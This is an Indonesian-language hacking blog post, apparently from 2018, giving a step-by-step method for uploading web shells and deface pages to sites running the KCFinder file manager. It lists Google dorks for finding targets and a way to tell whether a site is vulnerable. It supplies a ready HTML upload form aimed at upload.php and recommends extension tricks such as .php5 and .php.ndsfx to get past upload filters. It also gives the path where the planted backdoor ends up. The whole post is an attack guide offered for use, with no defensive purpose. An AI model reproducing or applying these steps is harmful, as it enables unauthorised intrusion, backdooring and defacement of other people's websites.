Home > Deface > Dork Fresh > Hacking > Tutorial > KCFinder Shell Upload

KCFinder Shell Upload

June 12, 2018 Deface, Dork Fresh, Hacking, Tutorial

Google Dork :

inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload
panel/kcfinder/upload/files
editor/kcfinder/upload
Kcfinder/upload/files

(selebihnya use ur briant)

Exploit :

www.site.com/path/kcfinder/upload.php

Jika tertulis ' Unknown error ' berarti itu vlun, jika bukan berarti tidak :D

Copy dan paste script CSRF di bawah, berformat html

<form method="POST" action="http://site.com/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>Hajar !</button>
</form>

Upload script deface kamu atau shell backdoor kamu...
tapi sebelum tanam shell, format harus di ganti ndsfx atau .php5 >> shell.php.ndsfx

Recomed shell [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & scriptdeface.html ]
Ext shell yg sering tidak bisa di upload =>"exe , com , msi , bat , php , phps , phtml , php3 , php4 , cgi , pl"

Letak shell / Defpage : www.site.com/[path]/kcfinder/upload/files/shelllu.php.ndsfx/etc

Semoga Bermanfaat

No comments

Subscribe to: Post Comments ( Atom )